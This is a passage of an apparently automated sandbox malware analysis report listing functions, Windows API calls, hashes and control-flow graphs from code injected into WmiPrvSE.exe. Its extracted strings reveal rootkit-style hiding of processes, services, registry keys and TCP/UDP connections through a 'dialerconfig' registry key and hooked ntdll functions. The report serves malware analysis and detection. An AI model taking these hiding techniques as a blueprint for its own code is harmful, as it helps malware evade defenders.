                          • Part of subcall function 000002534CF91628: RegCloseKey.ADVAPI32 ref: 000002534CF916F9
                          • Part of subcall function 000002534CF91628: RegOpenKeyExW.ADVAPI32 ref: 000002534CF91719
                          • Part of subcall function 000002534CF91628: RegCloseKey.ADVAPI32 ref: 000002534CF91734
                          • Part of subcall function 000002534CF91628: RegOpenKeyExW.ADVAPI32 ref: 000002534CF91754
                          • Part of subcall function 000002534CF91628: RegCloseKey.ADVAPI32 ref: 000002534CF9176F
                          • Part of subcall function 000002534CF91628: RegOpenKeyExW.ADVAPI32 ref: 000002534CF9178F
                          • Part of subcall function 000002534CF91628: RegCloseKey.ADVAPI32 ref: 000002534CF917AA
                          • Part of subcall function 000002534CF91628: RegOpenKeyExW.ADVAPI32 ref: 000002534CF917CA
                        • Sleep.KERNEL32 ref: 000002534CF91AD7
                        • SleepEx.KERNELBASE ref: 000002534CF91ADD
                          • Part of subcall function 000002534CF91628: RegCloseKey.ADVAPI32 ref: 000002534CF917E5
                          • Part of subcall function 000002534CF91628: RegOpenKeyExW.ADVAPI32 ref: 000002534CF91805
                          • Part of subcall function 000002534CF91628: RegCloseKey.ADVAPI32 ref: 000002534CF91820
                          • Part of subcall function 000002534CF91628: RegOpenKeyExW.ADVAPI32 ref: 000002534CF91840
                          • Part of subcall function 000002534CF91628: RegCloseKey.ADVAPI32 ref: 000002534CF9185B
                          • Part of subcall function 000002534CF91628: RegOpenKeyExW.ADVAPI32 ref: 000002534CF9187B
                          • Part of subcall function 000002534CF91628: RegCloseKey.ADVAPI32 ref: 000002534CF91896
                          • Part of subcall function 000002534CF91628: RegCloseKey.ADVAPI32 ref: 000002534CF918A0
                        Memory Dump Source
                        • Source File: 0000000A.00000002.2725997020.000002534CF90000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002534CF90000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_2534cf90000_WmiPrvSE.jbxd
                        Similarity
                        • API ID: CloseOpen$HeapSleep$AllocProcess
                        • String ID:
                        • API String ID: 1534210851-0
                        • Opcode ID: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
                        • Instruction ID: bf6703139a628d0047449c0b9d845582e1330f97b83ba64040ff8bd1f600d1b7
                        • Opcode Fuzzy Hash: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
                        • Instruction Fuzzy Hash: F9310F79200E4942FF54DB26DE493A993A5AB45BD6F04B4318F09872A5FF38CA51CB38
                        Function 000002534CF6273C Relevance: 1.7, APIs: 1, Instructions: 187libraryCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        APIs
                        Memory Dump Source
                        • Source File: 0000000A.00000002.2725938255.000002534CF60000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002534CF60000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_2534cf60000_WmiPrvSE.jbxd
                        Similarity
                        • API ID: LibraryLoad
                        • String ID:
                        • API String ID: 1029625771-0
                        • Opcode ID: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                        • Instruction ID: 8212bf0c46cfefaa552e08fc4ba0065f67311ca30eec320162d8ffe3597fee80
                        • Opcode Fuzzy Hash: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                        • Instruction Fuzzy Hash: 68613432B01A9887DB54CF65880873D73A2F794BE6F189121CE5A03798DA3CD953D734

                        Non-executed Functions

                        Function 000002534CF92B2C Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 264stringlibraryloaderCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 365 2534cf92b2c-2534cf92ba5 call 2534cfb2ce0 368 2534cf92bab-2534cf92bb1 365->368 369 2534cf92ee0-2534cf92f03 365->369 368->369 370 2534cf92bb7-2534cf92bba 368->370 370->369 371 2534cf92bc0-2534cf92bc3 370->371 371->369 372 2534cf92bc9-2534cf92bd9 GetModuleHandleA 371->372 373 2534cf92bdb-2534cf92beb GetProcAddress 372->373 374 2534cf92bed 372->374 375 2534cf92bf0-2534cf92c0e 373->375 374->375 375->369 377 2534cf92c14-2534cf92c33 StrCmpNIW 375->377 377->369 378 2534cf92c39-2534cf92c3d 377->378 378->369 379 2534cf92c43-2534cf92c4d 378->379 379->369 380 2534cf92c53-2534cf92c5a 379->380 380->369 381 2534cf92c60-2534cf92c73 380->381 382 2534cf92c83 381->382 383 2534cf92c75-2534cf92c81 381->383 384 2534cf92c86-2534cf92c8a 382->384 383->384 385 2534cf92c8c-2534cf92c98 384->385 386 2534cf92c9a 384->386 387 2534cf92c9d-2534cf92ca7 385->387 386->387 388 2534cf92d9d-2534cf92da1 387->388 389 2534cf92cad-2534cf92cb0 387->389 390 2534cf92ed2-2534cf92eda 388->390 391 2534cf92da7-2534cf92daa 388->391 392 2534cf92cc2-2534cf92ccc 389->392 393 2534cf92cb2-2534cf92cbf call 2534cf9199c 389->393 390->369 390->381 394 2534cf92dac-2534cf92db8 call 2534cf9199c 391->394 395 2534cf92dbb-2534cf92dc5 391->395 397 2534cf92cce-2534cf92cdb 392->397 398 2534cf92d00-2534cf92d0a 392->398 393->392 394->395 400 2534cf92df5-2534cf92df8 395->400 401 2534cf92dc7-2534cf92dd4 395->401 397->398 403 2534cf92cdd-2534cf92cea 397->403 404 2534cf92d0c-2534cf92d19 398->404 405 2534cf92d3a-2534cf92d3d 398->405 411 2534cf92e05-2534cf92e12 lstrlenW 400->411 412 2534cf92dfa-2534cf92e03 call 2534cf91bbc 400->412 401->400 410 2534cf92dd6-2534cf92de3 401->410 413 2534cf92ced-2534cf92cf3 403->413 404->405 406 2534cf92d1b-2534cf92d28 404->406 408 2534cf92d4b-2534cf92d58 lstrlenW 405->408 409 2534cf92d3f-2534cf92d49 call 2534cf91bbc 405->409 414 2534cf92d2b-2534cf92d31 406->414 416 2534cf92d7b-2534cf92d8d call 2534cf93844 408->416 417 2534cf92d5a-2534cf92d64 408->417 409->408 420 2534cf92d93-2534cf92d98 409->420 418 2534cf92de6-2534cf92dec 410->418 422 2534cf92e14-2534cf92e1e 411->422 423 2534cf92e35-2534cf92e3f call 2534cf93844 411->423 412->411 431 2534cf92e4a-2534cf92e55 412->431 413->420 421 2534cf92cf9-2534cf92cfe 413->421 414->420 426 2534cf92d33-2534cf92d38 414->426 416->420 424 2534cf92e42-2534cf92e44 416->424 417->416 429 2534cf92d66-2534cf92d79 call 2534cf9152c 417->429 430 2534cf92dee-2534cf92df3 418->430 418->431 420->424 421->398 421->413 422->423 425 2534cf92e20-2534cf92e33 call 2534cf9152c 422->425 423->424 424->390 424->431 425->423 425->431 426->405 426->414 429->416 429->420 430->400 430->418 436 2534cf92ecc-2534cf92ed0 431->436 437 2534cf92e57-2534cf92e5b 431->437 436->390 441 2534cf92e5d-2534cf92e61 437->441 442 2534cf92e63-2534cf92e7d call 2534cf985c0 437->442 441->442 444 2534cf92e80-2534cf92e83 441->444 442->444 447 2534cf92ea6-2534cf92ea9 444->447 448 2534cf92e85-2534cf92ea3 call 2534cf985c0 444->448 447->436 449 2534cf92eab-2534cf92ec9 call 2534cf985c0 447->449 448->447 449->436
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000000A.00000002.2725997020.000002534CF90000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002534CF90000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_2534cf90000_WmiPrvSE.jbxd
                        Similarity
                        • API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
                        • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                        • API String ID: 2119608203-3850299575
                        • Opcode ID: 9c3d18d3d08cd52b53439cd9635d78b514e0dbb1c6aaf52094b9259375ebc022
                        • Instruction ID: bfd568e71b8665121d65f7dbb72c34bbbbd381846a5a1f1ca725e7621fb0c54c
                        • Opcode Fuzzy Hash: 9c3d18d3d08cd52b53439cd9635d78b514e0dbb1c6aaf52094b9259375ebc022
                        • Instruction Fuzzy Hash: 0BB1BE76211E5882EF65DF65CC883B9A3A4FB44BD6F006016EE09537A4DB39CE40CB78
                        Function 000002534CF97D90 Relevance: 10.6, APIs: 7, Instructions: 72COMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 0000000A.00000002.2725997020.000002534CF90000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002534CF90000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_2534cf90000_WmiPrvSE.jbxd
                        Similarity
                        • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                        • String ID:
                        • API String ID: 3140674995-0
                        • Opcode ID: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
                        • Instruction ID: a721a9b3e4f82a05d05c5f93b5d54d49e644b1881e8a88945eb95be96a4faa67
                        • Opcode Fuzzy Hash: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
                        • Instruction Fuzzy Hash: FF314F72205F848AEB60DF60E8447EDB3A4F784785F44542ADA4D57B98EF3DC648CB24
                        Function 000002534CF9D2A4 Relevance: 9.1, APIs: 6, Instructions: 83COMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 0000000A.00000002.2725997020.000002534CF90000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002534CF90000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_2534cf90000_WmiPrvSE.jbxd
                        Similarity
                        • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                        • String ID:
                        • API String ID: 1239891234-0
                        • Opcode ID: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
                        • Instruction ID: cc8ed2d9353cbff719208e6f59e9c3bba0973f6e7792d0cbdd2cdd7bddc72f7a
                        • Opcode Fuzzy Hash: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
                        • Instruction Fuzzy Hash: 8A316E36214F8486EB60CF25EC4479EB3A0F789796F601126EA9D43B98DF3CC645CB24
                        Function 000002534CF97960 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 0000000A.00000002.2725997020.000002534CF90000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002534CF90000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_2534cf90000_WmiPrvSE.jbxd
                        Similarity
                        • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                        • String ID:
                        • API String ID: 2933794660-0
                        • Opcode ID: 561ac6f4885ef0f33bff27beb4ddb95e6a253367b5c72fac45fcb4617ca9122b
                        • Instruction ID: e0a08e122286764cff15f51f871d45784cceffa2e24aeec936a64a77420135c7
                        • Opcode Fuzzy Hash: 561ac6f4885ef0f33bff27beb4ddb95e6a253367b5c72fac45fcb4617ca9122b
                        • Instruction Fuzzy Hash: 8D113336710F0589EF00CF60EC593A833A4F759B99F441D21EA6D46794DF7CC2A483A0
                        Function 000002534CF9DCE0 Relevance: 1.6, APIs: 1, Instructions: 149COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000A.00000002.2725997020.000002534CF90000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002534CF90000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_2534cf90000_WmiPrvSE.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 29975c57d01bdb1e687cc302dc7d7dc5a8663a128fa1f3b93342ad94a271d3ec
                        • Instruction ID: a09f1422dd15a96b7cc5ef19c9f4734b83476b3b1908e383a6416fdf588949a2
                        • Opcode Fuzzy Hash: 29975c57d01bdb1e687cc302dc7d7dc5a8663a128fa1f3b93342ad94a271d3ec
                        • Instruction Fuzzy Hash: C951D532700A8489FF20DB72AC4879ABBA5F7447D9F145115EE5927B99DB3CC601CB28
                        Function 000002534CF918B4 Relevance: 1.3, APIs: 1, Instructions: 32memoryCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 000002534CF914A4: GetProcessHeap.KERNEL32 ref: 000002534CF914C5
                          • Part of subcall function 000002534CF914A4: HeapFree.KERNEL32 ref: 000002534CF914D4
                          • Part of subcall function 000002534CF914A4: GetProcessHeap.KERNEL32 ref: 000002534CF914E1
                          • Part of subcall function 000002534CF914A4: HeapFree.KERNEL32 ref: 000002534CF914F0
                          • Part of subcall function 000002534CF914A4: GetProcessHeap.KERNEL32 ref: 000002534CF91500
                          • Part of subcall function 000002534CF911D4: GetProcessHeap.KERNEL32 ref: 000002534CF911E1
                          • Part of subcall function 000002534CF911D4: HeapFree.KERNEL32 ref: 000002534CF911F0
                          • Part of subcall function 000002534CF911D4: GetProcessHeap.KERNEL32 ref: 000002534CF91200
                        • GetProcessHeap.KERNEL32 ref: 000002534CF91912
                        Memory Dump Source
                        • Source File: 0000000A.00000002.2725997020.000002534CF90000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002534CF90000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_2534cf90000_WmiPrvSE.jbxd
                        Similarity
                        • API ID: Heap$Process$Free
                        • String ID:
                        • API String ID: 3168794593-0
                        • Opcode ID: d75aecba9ac61c9fb542969a54dbcc8f2d065bcf5d1713c95c0cfb5eef25cc87
                        • Instruction ID: d3f982dc862d602c40ba63ae0032ffd45163821349919f8b64887fffb8d05af6
                        • Opcode Fuzzy Hash: d75aecba9ac61c9fb542969a54dbcc8f2d065bcf5d1713c95c0cfb5eef25cc87
                        • Instruction Fuzzy Hash: 8D014F3A614C8881DF45EF26CC551ACA334EBC9FC5F19A031AE0E47657CE38C980C768
                        Function 000002534CF736F0 Relevance: .0, Instructions: 32COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000A.00000002.2725938255.000002534CF60000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002534CF60000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_2534cf60000_WmiPrvSE.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 06df2142d5dd0183fd0e01b7d5608ecb5bc0210788fa76ce78b9fbce82fbb0aa
                        • Instruction ID: ca10fe7734c9c7278bdd4f6fbd3a440c7b64844bd6f8eda726c19684b87b050a
                        • Opcode Fuzzy Hash: 06df2142d5dd0183fd0e01b7d5608ecb5bc0210788fa76ce78b9fbce82fbb0aa
                        • Instruction Fuzzy Hash: 0EF068727156588EDB98CF68A80772977D1F3083C1FD09019D68983B04D33C9161CF38
                        Function 000002534CF91628 Relevance: 50.9, APIs: 20, Strings: 9, Instructions: 157registrymemoryCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000000A.00000002.2725997020.000002534CF90000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002534CF90000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_2534cf90000_WmiPrvSE.jbxd
                        Similarity
                        • API ID: Heap$CloseOpen$Process$Alloc$EnumFreeInfoQueryValuelstrlen
                        • String ID: SOFTWARE\dialerconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                        • API String ID: 106492572-2879589442
                        • Opcode ID: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
                        • Instruction ID: b28245cc656f595477a83de0c15fa56278a29a739d6942d7fb79e90936adee15
                        • Opcode Fuzzy Hash: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
                        • Instruction Fuzzy Hash: AE711A7A310E1886EB10DF66EC48699A364F784FCAF01A121DE4E43B69DF39C644C768
                        Function 000002534CF912BC Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 120memoryregistrystringCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000000A.00000002.2725997020.000002534CF90000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002534CF90000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_2534cf90000_WmiPrvSE.jbxd
                        Similarity
                        • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                        • String ID: d
                        • API String ID: 2005889112-2564639436
                        • Opcode ID: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
                        • Instruction ID: f9ff387f13c0959c8a23f4d30d29af16b906c58c3494800ae6f125faa080eb5d
                        • Opcode Fuzzy Hash: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
                        • Instruction Fuzzy Hash: BA516E36600F8886EB54CF66E94835AB7A1F789FCAF049124DE4A07718DF3DC249CB24
                        Function 000002534CF91D14 Relevance: 22.8, APIs: 1, Strings: 12, Instructions: 65threadCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000000A.00000002.2725997020.000002534CF90000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002534CF90000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_2534cf90000_WmiPrvSE.jbxd
                        Similarity
                        • API ID: CurrentThread$AddressHandleModuleProc
                        • String ID: EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$advapi32.dll$ntdll.dll$sechost.dll
                        • API String ID: 4175298099-1975688563
                        • Opcode ID: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
                        • Instruction ID: 4fcf581849ae61ccd9ad8cf5b6ea06c6d89f465f7fd4aa92a7aac4b6d607ae17
                        • Opcode Fuzzy Hash: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
                        • Instruction Fuzzy Hash: 4D3182B8200D4EA0EF05EBA9EC596E4A320F7047DAFC07423940A12575AF7D934DCBB8
                        Function 000002534CF66910 Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 230COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 207 2534cf66910-2534cf66916 208 2534cf66918-2534cf6691b 207->208 209 2534cf66951-2534cf6695b 207->209 210 2534cf66945-2534cf66984 call 2534cf66fc0 208->210 211 2534cf6691d-2534cf66920 208->211 212 2534cf66a78-2534cf66a8d 209->212 230 2534cf6698a-2534cf6699f call 2534cf66e54 210->230 231 2534cf66a52 210->231 213 2534cf66938 __scrt_dllmain_crt_thread_attach 211->213 214 2534cf66922-2534cf66925 211->214 215 2534cf66a8f 212->215 216 2534cf66a9c-2534cf66ab6 call 2534cf66e54 212->216 222 2534cf6693d-2534cf66944 213->222 218 2534cf66927-2534cf66930 214->218 219 2534cf66931-2534cf66936 call 2534cf66f04 214->219 220 2534cf66a91-2534cf66a9b 215->220 228 2534cf66ab8-2534cf66aed call 2534cf66f7c call 2534cf66e1c call 2534cf67318 call 2534cf67130 call 2534cf67154 call 2534cf66fac 216->228 229 2534cf66aef-2534cf66b20 call 2534cf67190 216->229 219->222 228->220 241 2534cf66b31-2534cf66b37 229->241 242 2534cf66b22-2534cf66b28 229->242 239 2534cf66a6a-2534cf66a77 call 2534cf67190 230->239 240 2534cf669a5-2534cf669b6 call 2534cf66ec4 230->240 235 2534cf66a54-2534cf66a69 231->235 239->212 257 2534cf66a07-2534cf66a11 call 2534cf67130 240->257 258 2534cf669b8-2534cf669dc call 2534cf672dc call 2534cf66e0c call 2534cf66e38 call 2534cf6ac0c 240->258 247 2534cf66b39-2534cf66b43 241->247 248 2534cf66b7e-2534cf66b94 call 2534cf6268c 241->248 242->241 246 2534cf66b2a-2534cf66b2c 242->246 253 2534cf66c1f-2534cf66c2c 246->253 254 2534cf66b45-2534cf66b4d 247->254 255 2534cf66b4f-2534cf66b5d call 2534cf75780 247->255 268 2534cf66b96-2534cf66b98 248->268 269 2534cf66bcc-2534cf66bce 248->269 260 2534cf66b63-2534cf66b78 call 2534cf66910 254->260 255->260 272 2534cf66c15-2534cf66c1d 255->272 257->231 280 2534cf66a13-2534cf66a1f call 2534cf67180 257->280 258->257 310 2534cf669de-2534cf669e5 __scrt_dllmain_after_initialize_c 258->310 260->248 260->272 268->269 277 2534cf66b9a-2534cf66bbc call 2534cf6268c call 2534cf66a78 268->277 270 2534cf66bd5-2534cf66bea call 2534cf66910 269->270 271 2534cf66bd0-2534cf66bd3 269->271 270->272 289 2534cf66bec-2534cf66bf6 270->289 271->270 271->272 272->253 277->269 304 2534cf66bbe-2534cf66bc6 call 2534cf75780 277->304 297 2534cf66a45-2534cf66a50 280->297 298 2534cf66a21-2534cf66a2b call 2534cf67098 280->298 294 2534cf66bf8-2534cf66bff 289->294 295 2534cf66c01-2534cf66c11 call 2534cf75780 289->295 294->272 295->272 297->235 298->297 309 2534cf66a2d-2534cf66a3b 298->309 304->269 309->297 310->257 311 2534cf669e7-2534cf66a04 call 2534cf6abc8 310->311 311->257
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000000A.00000002.2725938255.000002534CF60000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002534CF60000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_2534cf60000_WmiPrvSE.jbxd
                        Similarity
                        • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                        • String ID: `dynamic initializer for '$`eh vector copy constructor iterator'$`eh vector vbase copy constructor iterator'$scriptor'
                        • API String ID: 190073905-1786718095
                        • Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                        • Instruction ID: 8283b683ce621deceefdce4d279fc40c765215b5d65e80d87ea9b345807b08ce
                        • Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                        • Instruction Fuzzy Hash: DC81EF31700E0E86FA54EB259C4939963A0EB857C2F54B0259A09877B6DB3CCB47873C
                        Function 000002534CF9CE28 Relevance: 18.1, APIs: 12, Instructions: 112COMMONLIBRARYCODE
                        Download Yara Rule

                        Control-flow Graph

                        APIs
                        • GetLastError.KERNEL32 ref: 000002534CF9CE37
                        • FlsGetValue.KERNEL32(?,?,?,000002534CFA0A6B,?,?,?,000002534CFA045C,?,?,?,000002534CF9C84F), ref: 000002534CF9CE4C
                        • FlsSetValue.KERNEL32(?,?,?,000002534CFA0A6B,?,?,?,000002534CFA045C,?,?,?,000002534CF9C84F), ref: 000002534CF9CE6D
                        • FlsSetValue.KERNEL32(?,?,?,000002534CFA0A6B,?,?,?,000002534CFA045C,?,?,?,000002534CF9C84F), ref: 000002534CF9CE9A
                        • FlsSetValue.KERNEL32(?,?,?,000002534CFA0A6B,?,?,?,000002534CFA045C,?,?,?,000002534CF9C84F), ref: 000002534CF9CEAB
                        • FlsSetValue.KERNEL32(?,?,?,000002534CFA0A6B,?,?,?,000002534CFA045C,?,?,?,000002534CF9C84F), ref: 000002534CF9CEBC
                        • SetLastError.KERNEL32 ref: 000002534CF9CED7
                        • FlsGetValue.KERNEL32(?,?,?,?,?,?,?,000002534CFA0A6B,?,?,?,000002534CFA045C,?,?,?,000002534CF9C84F), ref: 000002534CF9CF0D
                        • FlsSetValue.KERNEL32(?,?,00000001,000002534CF9ECCC,?,?,?,?,000002534CF9BF9F,?,?,?,?,?,000002534CF97AB0), ref: 000002534CF9CF2C
                          • Part of subcall function 000002534CF9D6CC: HeapAlloc.KERNEL32 ref: 000002534CF9D721
                        • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,000002534CFA0A6B,?,?,?,000002534CFA045C,?,?,?,000002534CF9C84F), ref: 000002534CF9CF54
                          • Part of subcall function 000002534CF9D744: HeapFree.KERNEL32 ref: 000002534CF9D75A
                          • Part of subcall function 000002534CF9D744: GetLastError.KERNEL32 ref: 000002534CF9D764
                        • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,000002534CFA0A6B,?,?,?,000002534CFA045C,?,?,?,000002534CF9C84F), ref: 000002534CF9CF65
                        • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,000002534CFA0A6B,?,?,?,000002534CFA045C,?,?,?,000002534CF9C84F), ref: 000002534CF9CF76
                        Memory Dump Source
                        • Source File: 0000000A.00000002.2725997020.000002534CF90000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002534CF90000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_2534cf90000_WmiPrvSE.jbxd
                        Similarity
                        • API ID: Value$ErrorLast$Heap$AllocFree
                        • String ID:
                        • API String ID: 570795689-0
                        • Opcode ID: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
                        • Instruction ID: 3f0794cb1c2ef0af2c0caf66dd72297162897cd031812cfd9cfd725adc311937
                        • Opcode Fuzzy Hash: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
                        • Instruction Fuzzy Hash: F94150B4201E4C42FE68E7325D5D369A1525B847F6F287724A937066D6FE3C86015F38
                        Function 000002534CF92244 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 52filethreadCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000000A.00000002.2725997020.000002534CF90000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002534CF90000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_2534cf90000_WmiPrvSE.jbxd
                        Similarity
                        • API ID: Process$File$CloseHandle$CreateCurrentOpenReadThreadWow64Write
                        • String ID: \\.\pipe\dialerchildproc32$\\.\pipe\dialerchildproc64
                        • API String ID: 2171963597-1373409510
                        • Opcode ID: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
                        • Instruction ID: 4ca35dfbd84312bba87617b9bd95db43a8b4a770f8c6456f180c50fa2555e147
                        • Opcode Fuzzy Hash: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
                        • Instruction Fuzzy Hash: AD217176614B4482FB10CB25F84836AB7A0F784BE6F505215DA5903BA8CF7DC249CF24
                        Function 000002534CF69944 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 317COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 463 2534cf69944-2534cf699ac call 2534cf6a814 466 2534cf69e13-2534cf69e1b call 2534cf6bb48 463->466 467 2534cf699b2-2534cf699b5 463->467 467->466 469 2534cf699bb-2534cf699c1 467->469 471 2534cf699c7-2534cf699cb 469->471 472 2534cf69a90-2534cf69aa2 469->472 471->472 473 2534cf699d1-2534cf699dc 471->473 474 2534cf69aa8-2534cf69aac 472->474 475 2534cf69d63-2534cf69d67 472->475 473->472 477 2534cf699e2-2534cf699e7 473->477 474->475 476 2534cf69ab2-2534cf69abd 474->476 478 2534cf69d69-2534cf69d70 475->478 479 2534cf69da0-2534cf69daa call 2534cf68a34 475->479 476->475 480 2534cf69ac3-2534cf69aca 476->480 477->472 481 2534cf699ed-2534cf699f7 call 2534cf68a34 477->481 478->466 482 2534cf69d76-2534cf69d9b call 2534cf69e1c 478->482 479->466 491 2534cf69dac-2534cf69dcb call 2534cf66d40 479->491 484 2534cf69c94-2534cf69ca0 480->484 485 2534cf69ad0-2534cf69b07 call 2534cf68e10 480->485 481->491 496 2534cf699fd-2534cf69a28 call 2534cf68a34 * 2 call 2534cf69124 481->496 482->479 484->479 492 2534cf69ca6-2534cf69caa 484->492 485->484 500 2534cf69b0d-2534cf69b15 485->500 493 2534cf69cba-2534cf69cc2 492->493 494 2534cf69cac-2534cf69cb8 call 2534cf690e4 492->494 493->479 499 2534cf69cc8-2534cf69cd5 call 2534cf68cb4 493->499 494->493 507 2534cf69cdb-2534cf69ce3 494->507 531 2534cf69a2a-2534cf69a2e 496->531 532 2534cf69a48-2534cf69a52 call 2534cf68a34 496->532 499->479 499->507 505 2534cf69b19-2534cf69b4b 500->505 509 2534cf69c87-2534cf69c8e 505->509 510 2534cf69b51-2534cf69b5c 505->510 512 2534cf69ce9-2534cf69ced 507->512 513 2534cf69df6-2534cf69e12 call 2534cf68a34 * 2 call 2534cf6baa8 507->513 509->484 509->505 510->509 514 2534cf69b62-2534cf69b7b 510->514 516 2534cf69cef-2534cf69cfe call 2534cf690e4 512->516 517 2534cf69d00 512->517 513->466 518 2534cf69c74-2534cf69c79 514->518 519 2534cf69b81-2534cf69bc6 call 2534cf690f8 * 2 514->519 527 2534cf69d03-2534cf69d0d call 2534cf6a8ac 516->527 517->527 523 2534cf69c84 518->523 546 2534cf69bc8-2534cf69bee call 2534cf690f8 call 2534cf6a038 519->546 547 2534cf69c04-2534cf69c0a 519->547 523->509 527->479 539 2534cf69d13-2534cf69d61 call 2534cf68d44 call 2534cf68f50 527->539 531->532 537 2534cf69a30-2534cf69a3b 531->537 532->472 545 